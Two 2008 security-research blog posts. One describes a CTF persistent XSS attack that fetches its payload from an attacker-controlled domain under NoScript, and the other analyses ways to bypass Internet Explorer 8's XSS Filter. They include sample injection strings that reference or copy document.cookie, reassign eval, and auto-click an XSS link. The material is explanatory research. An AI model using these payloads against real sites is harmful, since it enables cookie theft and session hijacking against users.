Wednesday, September 24, 2008

Dynamic XSS Payloads in the face of NoScript

While participating in the CSAW CTF on the weekend before last with s0ban, sirdarckcat and maluc (which we won btw, with 16375 points; RPISEC who placed second had 13575 points, go us ;), I had an interesting thought; one of our attacks was a persistent xss attack that loaded it's payload from off-site so that we could gain some level of persistent control, however I realised that this attack would fail completely in the face of NoScript even if our xss succeeded since the person would not have our malicious domain whitelisted.

So, in light of that, I was thinking of how we could load our payload from off-site, without the remote site running JavaScript. Of course, I am assuming you have already bypassed NoScript's XSS Filters (e.g. because the attack was persistent), but this information is particularly useful for persistent attacks when you may want to change the payload.

After thinking about this for a while, I realised that we've already solved the problem a while ago when we were talking about using TinyURL for data storage way back in 2006: http://kuza55.blogspot.com/2006/12/using-tinyurl-for-storage-includes-poc.html.

Of course TinyURL would be of no use to us here as we are interested in being able to change our payload, however all it would require to be useful is (possibly some kind of synchronisation so that we execute in the order we want, rather than the order we get data back from our evil web server and) changing the URL to point to a domain you control.

Nothing really ground-breaking, but something interesting nonetheless.

Thursday, September 04, 2008

IE8 XSS Filter

IE8 came out recently and a bunch of people have already commented about the limitations of the XSS Filter.

But there are a few more issues that need to be looked at. First of all, if anyone hasn't already done so, I recommend reading this post by David Ross on the architecture/implementation of the XSS Filter.

After talking Cesar Cerrudo, it became clear that we both came to the conclusion that the easiest way to have a generic bypass technique for the filter would be to attack the same-site check, and we both came to the conclusion that, if we can somehow force the user to navigate from a page on the site we want to attack to our xss, then we've bypassed the filter.

If the site is a forum, or a blog, then this becomes trivial as we're allowed to post links, however even if we cannot normally post links this is still trivial as we can inject links in our XSS as the XSS Filter doesn't stop HTML Injection, in any case read this for more details.

However, this is not the only way to force a client-side navigation. One particular issue (which is normally not considered much of a vulnerability, unless it allows xss vulns) is when an application lets users control the contents of a frame, this is often seen in the help sections of web apps. However navigation caused by an iframe seems to be considered somehow user-initiated (or something) and the same-site check is applied so that if we point a frame on a site to an xss exploit, the xss exploit will trigger.

Initially I had thought this would extend to JavaScript based redirects of the form:
document.location = "http://www.site.com/user_input";
or in the form of frame-breaking code, however this does not seem to be the case. IE attempts to determine whether a redirect was user-initiated or not and if it decides it is not user-initiated then it does not apply the same-site check and simply initiates the XSS Filter, though as with the popup blocker before it has some difficulty being correct 100% of the time, e.g. this counts as a user-initiated navigation:
<a name="x" id="x" href="http://localhost/xss.php?xss=<script>alert(7)</script>">test</a>
<script>
document.links[0].click();
</script>

However this is probably a very unrealistic issue as we need to vulnerable site to actually let the attacker create such a construct.

Furthermore HTTP Location redirects and Meta Refreshes are also not considered user navigation so filtering is always applied to those, therefore Open Redirects are pretty irrelevant to the XSS Filter.

However, Flash-based redirects do not seem to be considered redirects (which is unsurprising given that IE has no visibility into Flash files) and so any Flash-based redirects can be taken advantage of to bypass the xss filter, though if they require a user to click then it is probably simply easier to just inject a link (as described in Cesar's post)

And that's about all I could think of wrt that check :S

However, if you go read Cesar's post you'll see we now do have a method to generically bypass the IE8 XSS Filter, and it only requires an additional click from the user, anywhere on the page.

In a completely different direction, When I first read the posts that said the XSS filter was going to prevent injections into quoted JavaScript strings, my first thought was "yeah, right, let's see them try", as I had assumed they would attempt to prevent an attacker breaking out of the string, however the filter has signatures to stop the actual payload. Essentially the filter attempts to stop you from calling a JavaScript function and assigning data to sensitive attributes, so all of the following injections are filtered:
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//

among a variety of other sensitive attributes, however this does still leave us with some limited scope for an attack that may be possible in reasonably complicated JavaScript.

We are still left with the ability to:
- Reference sensitive variables, which is esnecially useful when injecting into redirects, e.g.
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//

Also, like the meta-tag stripping attack described by the 80sec guys (awesome work btw, go 80sec!), we can strip other pieces of data (which look like xss attacks) such as frame-breaking code, redirects, etc, but note we can't strip single lines of JS as the JS block needs to be syntactically valid for it to start getting executed, so anything potentially active which acts as a security measure beyond the extent of it's own tag can be stripped.

It's also worth noting that XSS Filter doesn't strip all styles, it only strips those that would allow more styles to slip past it and styles which can execute active code (which is pretty much just expression() )

And that's all for me at the moment; if anyone's looking for an interesting area for research, see if the IE8 XSS Filter always plays nice with server-side XSS Filters, who knows, maybe being able to break the context by getting the filter to strip stuff you can get your own html to be rendered in a different context that the server-side filter didn't expect.

P.S. Take this all with a grain of salt, this has been derived through black-box testing, and as such any of the conclusions above are really just educated guesses.

P.P.S Good on David Ross and Microsoft for making a positive move forward that's going to be opt-out. Obviously everyone is going to keep attacking it and finding weaknesses, but even if this only stops the scenario where the injection is right in the body of the page, then it's a huge step forward for webappsec; if this effectively blocks injections into JavaScript strings then ASP.NET apps just got a whole lot more secure.
Though I still think the HTML-injection issue needs to be fixed, because even if it's an additional step, users are going to click around and we're just going to see attackers start utilising HTML injection

P.P.P.S. Don't forget this is based on security zones, so it can be disabled and is by default opt-in for the intranet zone, so all those local zone xss's for web servers on localhost or xss's for intranet apps are going to be largely unaffected